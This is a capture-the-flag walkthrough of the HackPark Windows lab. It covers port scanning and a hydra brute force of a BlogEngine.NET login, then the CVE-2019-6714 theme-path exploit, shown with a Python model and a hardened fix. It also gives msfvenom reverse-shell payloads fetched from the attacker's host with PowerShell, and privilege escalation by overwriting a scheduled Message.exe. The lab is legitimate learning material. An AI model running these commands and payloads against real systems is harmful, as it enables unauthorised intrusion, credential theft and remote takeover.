nmap -A -p- -oA output 10.10.142.176 --min-rate=10000 --script=vuln --script-timeout=15 -v


Download the clown image from the site and reverse-search it at https://tineye.com/. The clown is Pennywise.

nmap -sC -sV -O -p- -oA hackpark 10.10.142.176

nmap -sU -O -p- -oA hackpark-udp 10.10.142.176

nikto -h 10.10.142.176:80

gobuster dir -k -u http://10.10.142.176:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

curl -s http://10.10.142.176/Account/login.aspx?ReturnURL=/admin/ | grep "<form"


The __VIEWSTATE and __EVENTVALIDATION values are copied from the hidden fields of the login form (the curl above); "Login failed" is the string hydra looks for to recognise a failed attempt.

hydra -f -l admin -P /data/src/wordlists/rockyou.txt 10.10.142.176 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

Result: admin / 1qaz2wsx


Log in with the credentials above and click About. The BlogEngine.NET version is 3.3.6.0.


There is a matching exploit on Exploit-DB (BlogEngine.NET 3.3.6 directory traversal / RCE, CVE-2019-6714): https://www.exploit-db.com/raw/46353

Save it as PostView.ascx (the file name matters, since the theme loader looks for that name) and change the attacker IP and port inside it to the listener we will start.
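Why the uploaded file ends up executing, as an added illustration that is not BlogEngine's code: the Exploit-DB entry abuses a theme name that the application concatenates into the path of the theme's PostView.ascx without validation, so a theme of ../../App_Data/files points the loader at the file-manager upload directory. The Python below models that string building beside a hardened variant; the web root and the Custom/Themes layout are assumptions, and POSIX separators are used so the model runs anywhere.

```python
#!/usr/bin/env python3
"""Model of the theme-path directory traversal behind EDB-46353 (not the real app)."""
import posixpath
import re

WEBROOT = "/inetpub/wwwroot/blog"                     # assumed site root
THEMES_ROOT = posixpath.join(WEBROOT, "Custom", "Themes")
THEME_NAME = re.compile(r"^[A-Za-z0-9_-]+$")          # allowlist for a theme folder name


def postview_path_vulnerable(theme):
    """Naive '{themes}/{theme}/PostView.ascx': any '..' in theme walks out of the root."""
    return posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))


def postview_path_hardened(theme):
    """Accept only a plain folder name, then verify the resolved path stays in THEMES_ROOT.

    The allowlist stops '..', separators and absolute paths outright; the
    commonpath check is defence in depth in case the allowlist is loosened later.
    """
    if not THEME_NAME.fullmatch(theme):
        raise ValueError(f"theme {theme!r} is not a plain folder name")
    candidate = posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))
    if posixpath.commonpath([THEMES_ROOT, candidate]) != THEMES_ROOT:
        raise ValueError(f"theme {theme!r} escapes the themes directory")
    return candidate


def escapes_themes_root(theme):
    """True when the naive build lands outside THEMES_ROOT (i.e. traversal succeeded)."""
    path = postview_path_vulnerable(theme)
    return posixpath.commonpath([THEMES_ROOT, path]) != THEMES_ROOT


if __name__ == "__main__":
    # The exploit's theme value and a legitimate one, side by side.
    for theme in ("Standard", "../../App_Data/files"):
        print(f"{theme!r:24} naive -> {postview_path_vulnerable(theme)}")
        try:
            print(f"{'':24} hardened -> {postview_path_hardened(theme)}")
        except ValueError as err:
            print(f"{'':24} hardened -> rejected: {err}")
```

With the naive build, ../../App_Data/files resolves two levels up from Custom/Themes into App_Data/files/PostView.ascx, which is exactly where the file manager stores uploads; that is why uploading PostView.ascx there and then selecting that theme runs attacker code.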


Go to http://10.10.142.176/admin/#/content/posts

Open the post named Welcome to HackPark and click the File manager icon.


Upload the modified PostView.ascx.


Click Save. Start the listener on the port set in PostView.ascx, then trigger the payload as the Exploit-DB entry instructs, by requesting the upload directory as the theme: http://10.10.142.176/?theme=../../App_Data/files

rlwrap nc -lvnp 4445


msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=tun0 LPORT=7777 -f exe -o hackpark.exe

python -m http.server 8888


powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/hackpark.exe' -OutFile 'c:\windows\temp\hackpark.exe'"


$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 7777
msf6 exploit(multi/handler) > run

Now in the shell on the Windows server:
c:\windows\system32\inetsrv>cd \windows\temp
c:\Windows\Temp>dir
c:\Windows\Temp>.\hackpark.exe

meterpreter> ps


meterpreter > cd "c:\program files (x86)"
meterpreter > ls


meterpreter > cd SystemScheduler
meterpreter > ls


meterpreter > cd events
meterpreter > ls


meterpreter > cat 20198415519.INI_LOG.txt

The scheduler's event log shows the job it keeps launching: Message.exe from the SystemScheduler directory. If the web user can write to that directory, replacing Message.exe gets our payload executed by the scheduler.


msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=tun0 LPORT=1234 -f exe -o Message.exe

$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run

Run the following on the Windows machine to overwrite the scheduler's Message.exe with our payload (the web server is still serving it on port 8888):
powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

There is no need to launch it ourselves: the next time the scheduler runs Message.exe, the handler on port 1234 receives the new session.

To find the same path with an enumeration script instead, download winPEAS to the box (the file is a .bat, so keep that extension so it can be run with cmd):
powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/winPEAS.bat' -OutFile 'c:\windows\temp\winpeas.bat'"


Copyright © 2022 Cu3rv0x. All rights reserved.